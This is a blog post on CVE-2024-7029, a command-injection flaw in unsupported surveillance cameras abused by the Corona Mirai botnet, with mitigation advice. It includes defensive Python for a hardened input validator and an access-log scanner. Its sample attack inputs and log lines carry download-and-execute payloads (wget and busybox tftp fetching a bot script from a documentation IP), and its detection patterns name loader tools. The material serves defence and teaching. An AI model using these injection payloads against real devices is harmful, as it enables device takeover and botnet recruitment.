Zero-Day Vulnerability in Surveillance Cameras

LotusChain
3 min read · Sep 18, 2024


Research: LotusChain-Ai

Unpatchable Zero-Day Vulnerability in Surveillance Cameras: A Growing Threat

The discovery of a critical zero-day vulnerability, CVE-2024-7029, in certain models of surveillance cameras has drawn wide attention. The flaw has been exploited to install a variant of the Mirai malware known as Corona Mirai, which has been actively targeting these devices since March 2024. The impact is significant because the affected cameras were discontinued in 2019 and have received no firmware updates since.

Understanding CVE-2024-7029

CVE-2024-7029 is a command injection vulnerability that lets an unauthenticated, remote attacker execute arbitrary operating-system commands on the camera. The flaw lies in the camera's firmware, specifically in how it processes requests that change device settings: a request parameter reaches a system command without validation, so an attacker who can reach the web interface can append shell syntax to the parameter value and take control of the device without any credentials.
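The following is an added illustration, not code from the affected firmware, from the vulnerability report, or from this post's author. It shows the general shape of the bug class in a hypothetical CGI-style settings handler: the vulnerable version splices a request parameter into a shell command line, and the hardened version validates the value as a bounded integer and invokes the program with an argument list instead of a shell. The endpoint, the `level` parameter and the `/bin/setlevel` program are invented for the example; the hardened demo runs `echo` in place of the real binary so it executes offline.

```python
import subprocess
from urllib.parse import parse_qs

# Hypothetical program that the settings handler would invoke (not a real path).
SETLEVEL_BIN = "/bin/setlevel"


def vulnerable_build_command(query_string: str) -> str:
    """Vulnerable pattern: splice an unauthenticated request parameter into a
    shell command line.

    A real handler would hand this string to a shell (system()/popen()). It is
    only returned here so the injection is visible without executing anything.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    level = params.get("level", [""])[0]
    # No authentication and no validation: ';', '|', '`' and '$(...)' in the
    # value survive into the command line and are interpreted by the shell.
    return f"{SETLEVEL_BIN} {level}"


def hardened_build_argv(query_string: str) -> list[str]:
    """Hardened pattern: accept only a bounded ASCII integer and build an argv
    list for subprocess.run() without shell=True, so the value is never parsed
    by a shell even if validation were loosened later."""
    params = parse_qs(query_string, keep_blank_values=True)
    values = params.get("level")
    if not values or len(values) != 1:
        raise ValueError("exactly one 'level' parameter is required")
    raw = values[0]
    # isascii() rules out Unicode digits that int() would happily accept.
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 3:
        raise ValueError(f"'level' must be a 0-100 integer, got {raw!r}")
    level = int(raw)
    if not 0 <= level <= 100:
        raise ValueError(f"'level' out of range: {level}")
    return [SETLEVEL_BIN, str(level)]


def is_accepted(query_string: str) -> bool:
    """True if the hardened validator accepts the request."""
    try:
        hardened_build_argv(query_string)
        return True
    except ValueError:
        return False


def hardened_apply(query_string: str) -> str:
    """Run the validated command without a shell. For this offline demo the
    real binary is replaced by 'echo', so the output is the argument that
    would have been passed to it."""
    argv = hardened_build_argv(query_string)
    demo_argv = ["echo"] + argv[1:]  # echo stands in for SETLEVEL_BIN
    result = subprocess.run(demo_argv, capture_output=True, text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    # Constructed attack query, decoded: "50;wget http://198.51.100.7/bot.sh -O /tmp/x"
    attack = "level=50%3Bwget%20http%3A%2F%2F198.51.100.7%2Fbot.sh%20-O%20%2Ftmp%2Fx"
    print("vulnerable would run   :", vulnerable_build_command(attack))
    print("hardened accepts attack:", is_accepted(attack))
    print("hardened accepts 50    :", is_accepted("level=50"))
    print("hardened ran           :", hardened_apply("level=50"))
```

The important design choice is that the hardened path does two independent things: it rejects anything that is not a small integer, and it never hands the value to a shell at all. Either measure alone would stop this payload; together, a future relaxation of the validator (say, to allow a string value) still cannot reintroduce shell interpretation.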

Severity and Impact

The vulnerability has been assigned a CVSS base score of 8.7 (High). The score reflects its low attack complexity and the absence of any authentication requirement; the availability of public exploit code further raises the practical risk. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory warning that these cameras remain in use across critical sectors, including healthcare, transportation, and commercial facilities.

Although proof-of-concept (PoC) exploit code has been publicly available since at least 2019, the flaw only received a CVE identifier in August 2024. That five-year gap between public disclosure and formal tracking likely contributed to the vulnerability being overlooked until it was exploited in the wild.

Exploitation Trends

The first recorded exploitation of CVE-2024-7029 began on March 18, 2024, although evidence suggests that the campaign's preparatory activity may have started as early as December 2023. The malware deployed through this vulnerability connects to command-and-control (C2) servers and waits for instructions to launch Distributed Denial of Service (DDoS) attacks.

Targeted Systems

The affected devices are surveillance camera models that share the same firmware code base. Because they have reached end-of-life status, no patches or firmware updates are expected from the manufacturer, leaving anyone still running them exposed to ongoing exploitation.

Recommendations for Users

For users of affected surveillance cameras, immediate action is crucial:

  • Replace Devices: Since these cameras are no longer supported, replacing them with models that still receive security updates is the only complete fix.
  • Network Isolation: Ensure vulnerable devices are not reachable from the internet. Place them on a dedicated network segment, allow only the management hosts that need to reach them, and block outbound connections from the cameras so that an implanted bot cannot reach its C2 server.
  • Change Default Credentials: Change default passwords to strong, unique ones. Note that this does not stop CVE-2024-7029 itself, which requires no authentication, but it blocks the credential-guessing attacks that Mirai variants also use to spread.
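As an added example of the kind of check a defender can run while isolation and replacement are under way, and not code from the post's author or from any vendor, the following scans web-server access logs for requests to a CGI settings endpoint whose parameter values carry shell control characters or the download-and-execute tooling typical of Mirai-style loaders. It checks every parameter on any watched path rather than one specific field, so it generalizes beyond the single flaw discussed here. The sample log lines, the `/cgi-bin/settings.cgi` endpoint and the parameter names are constructed for the example; IP addresses are from RFC 5737 documentation ranges.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Common Log Format). The endpoint,
# parameters and addresses are invented; the two requests from 198.51.100.7
# mimic the shape of an IoT command-injection attempt that fetches and runs
# a bot binary. The third line is double-percent-encoded on purpose.
SAMPLE_LOG = """\
203.0.113.10 - - [18/Mar/2024:09:14:02 +0000] "GET /cgi-bin/settings.cgi?level=50 HTTP/1.1" 200 64
198.51.100.7 - - [18/Mar/2024:09:14:05 +0000] "GET /cgi-bin/settings.cgi?level=50%3Bwget%20http%3A%2F%2F198.51.100.7%2Fbot.sh%20-O%20%2Ftmp%2Fx%3Bsh%20%2Ftmp%2Fx HTTP/1.1" 200 64
198.51.100.7 - - [18/Mar/2024:09:14:06 +0000] "GET /cgi-bin/settings.cgi?level=%2524%2528busybox%2520tftp%2520-g%2520198.51.100.7%2529 HTTP/1.1" 200 64
203.0.113.22 - - [18/Mar/2024:09:15:40 +0000] "GET /cgi-bin/settings.cgi?name=Black%20%26%20White HTTP/1.1" 200 64
203.0.113.30 - - [18/Mar/2024:09:16:01 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Shell control operators that have no business in a settings value.
SHELL_META = re.compile(r"[;|`\n]|\$\(|&&")
# Fetch-and-run tooling typical of Mirai-style loaders.
LOADER_WORDS = re.compile(r"\b(wget|curl|tftp|busybox|chmod)\b|/tmp/")


def parse_log_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        # parse_qsl splits on '&' first, then percent-decodes each value once.
        "params": parse_qsl(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def injection_indicators(params):
    """Return a list of reasons a parameter set looks like command injection."""
    reasons = []
    for name, value in params:
        # Decode a second time so double-encoded payloads (%253B -> %3B -> ;)
        # are inspected in their final form.
        decoded = unquote(value)
        if SHELL_META.search(decoded):
            reasons.append(f"shell metacharacter in {name!r}")
        if LOADER_WORDS.search(decoded):
            reasons.append(f"loader tooling in {name!r}")
    return reasons


def scan_log(text, watched_paths=("/cgi-bin/",)):
    """Scan log text and return findings for suspicious requests on watched paths."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None or not rec["path"].startswith(watched_paths):
            continue
        reasons = injection_indicators(rec["params"])
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "path": rec["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']}: {', '.join(f['reasons'])}")
```

Two details matter in practice. A legitimate value containing a single `&` (the "Black & White" line) is not flagged, because the indicators look for shell operators rather than for any punctuation. And values are decoded a second time before inspection, since a loader that double-encodes its payload would otherwise slip past a check that only sees `%24%28`.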

Conclusion

CVE-2024-7029 is one more instance of a growing pattern: legacy devices with unpatched vulnerabilities become prime targets for cyber-criminals precisely because nobody is left to fix them. As the Corona Mirai botnet's use of this flaw shows, organizations must keep an inventory of the devices on their networks and prioritize timely updates, or replacement, for hardware that has fallen out of support. The continuing evolution of threats in this space reinforces the need for proactive security measures to protect critical infrastructure and sensitive data.
